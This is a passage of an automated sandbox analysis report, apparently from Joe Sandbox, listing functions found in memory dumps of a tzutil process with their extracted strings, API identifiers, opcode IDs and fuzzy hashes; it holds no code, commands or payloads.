                                                              • Instruction Fuzzy Hash: 7A022475608341AFC304CF19C890A6FBBE5EFC8704F458A2EF9999B264DB35E905CB46
                                                              Function 033DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 0eadbdbaf0623578527a75bd739a20d165663d64212794c14761102e2ae70941
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 3981CF76E052499FDF24CE68E8D17FEFBB6AF45350F1E425AE861A7390C73488408B60
                                                              Function 034420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 7cfc6199070590ac777e88a0663a9da9685a51378a51d1a9012aea912e519d3f
                                                              • Instruction ID: 5649bffbeaa26a6731442d3ddb94472eadf95226dc0ece5aba122aa80952ac98
                                                              • Opcode Fuzzy Hash: 7cfc6199070590ac777e88a0663a9da9685a51378a51d1a9012aea912e519d3f
                                                              • Instruction Fuzzy Hash: 7321567AE00219ABDB10DF69D8809EFB7E8EF44650F080526F915E7244E770D901CBA5
                                                              Function 031C3CBE Relevance: 8.8, Strings: 7, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2603802961.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_31c0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                              • API String ID: 0-1416458366
                                                              • Opcode ID: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction ID: 4ada29a0bc4cf5a4b67caa5dbd3a72ba596eabd726273ac13d805c1a31b4533c
                                                              • Opcode Fuzzy Hash: dedf437aa38687259b1bad9c904173211a3205b851b084e00ad0a60b07b74ce9
                                                              • Instruction Fuzzy Hash: 443102B091038CEBCB05CF94D5886DEBBB1FF04388F81855DE81A6F250C771865ACB8A
                                                              Function 033BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 0340031E
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034002BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034002E7
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 9bf6fb00ae0c2058de525bd969aa4e26cc49d5013317cb3cc2c6dc8aa2423f70
                                                              • Instruction ID: 9ee96af937209eaf5d71f15d75286eab2fbc983b5ec1044394a26d13010a9539
                                                              • Opcode Fuzzy Hash: 9bf6fb00ae0c2058de525bd969aa4e26cc49d5013317cb3cc2c6dc8aa2423f70
                                                              • Instruction Fuzzy Hash: 2AE1CD306087419FD725CF28C885B6AB7F4BB88314F180A6EF6A58BAE0D774D945CB42
                                                              Function 033CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 03407BAC
                                                              • RTL: Resource at %p, xrefs: 03407B8E
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03407B7F
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 9eb987b22883ea42f26b336bacd75a68a88d559558b162a20688d0012d8a7f60
                                                              • Instruction ID: 8f0c69cd5733023fc1cc85de9cf8850e2ec4ed35dc20dbbb5ce608a52a1287e0
                                                              • Opcode Fuzzy Hash: 9eb987b22883ea42f26b336bacd75a68a88d559558b162a20688d0012d8a7f60
                                                              • Instruction Fuzzy Hash: 3C41CD357107429FC724DE25DC82B6BF7E9EF88710F040A2EE95A9B780DB31E8058B95
                                                              Function 033CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0340728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 034072C1
                                                              • RTL: Resource at %p, xrefs: 034072A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03407294
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 9494f414de711440892e61a40495c664292b65300375972f47ed3d564b67c8bc
                                                              • Instruction ID: e4b0e642c3948f8d6d6f720ef08427d656064cbd0d0a88c5b7419f433db31109
                                                              • Opcode Fuzzy Hash: 9494f414de711440892e61a40495c664292b65300375972f47ed3d564b67c8bc
                                                              • Instruction Fuzzy Hash: CB41FE35704256AFC720DE25CC82B6AFBA9FB44710F14062EF855AF680DB31F8528BD6
                                                              Function 03442300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 407ae242d043cd9fe0f4f7b85265e32795484e72daebe3e22918152da507d4c0
                                                              • Instruction ID: bb42ec9596744953d1f9c2e96f90ad4c4b0d5afc13ff99d4e29730fd8c0439fb
                                                              • Opcode Fuzzy Hash: 407ae242d043cd9fe0f4f7b85265e32795484e72daebe3e22918152da507d4c0
                                                              • Instruction Fuzzy Hash: A1315776A006299FDB60DF39DC40BEFB7B8EB44610F444966E849E7240EB709A458B64
                                                              Function 033D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 3feceed6c17081e145a59fa516133aed9e5dd0a909c189cee6ad251dc4784ead
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: C891C272E002169BDB34CE69ECC16BEF7A9FF44320F58461AE865EB2D0D73499418750
                                                              Function 03399126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 4f44547a27ce78b206e103f2518c3de56cb3e7e5631dc174e6f9b4b0aad62ad5
                                                              • Instruction ID: d7f5e8f1ee2e2a2e027ec28e6a4c8101c495504eebb431e52d245d5d1029efbb
                                                              • Opcode Fuzzy Hash: 4f44547a27ce78b206e103f2518c3de56cb3e7e5631dc174e6f9b4b0aad62ad5
                                                              • Instruction Fuzzy Hash: DE812D76D01269DFDB35DB54CC84BEEB7B8AB08710F0445DAAA19B7640D7705E84CFA0
                                                              Function 0341CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0341CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4_w@4_w
                                                              • API String ID: 4062629308-713214301
                                                              • Opcode ID: 6944017242e1b4047e9c25b389c04f8f0ca4584eb1d06a4709e6981ac0f30e01
                                                              • Instruction ID: c472745d32664a089d636a0a8bd5dbed9cbda397f241f0f76d2128ab90b9be6b
                                                              • Opcode Fuzzy Hash: 6944017242e1b4047e9c25b389c04f8f0ca4584eb1d06a4709e6981ac0f30e01
                                                              • Instruction Fuzzy Hash: A2418EB9D00614DFCB21EF99C880AAEBBB8EF46B14F14452BE915DF264D734C811CB69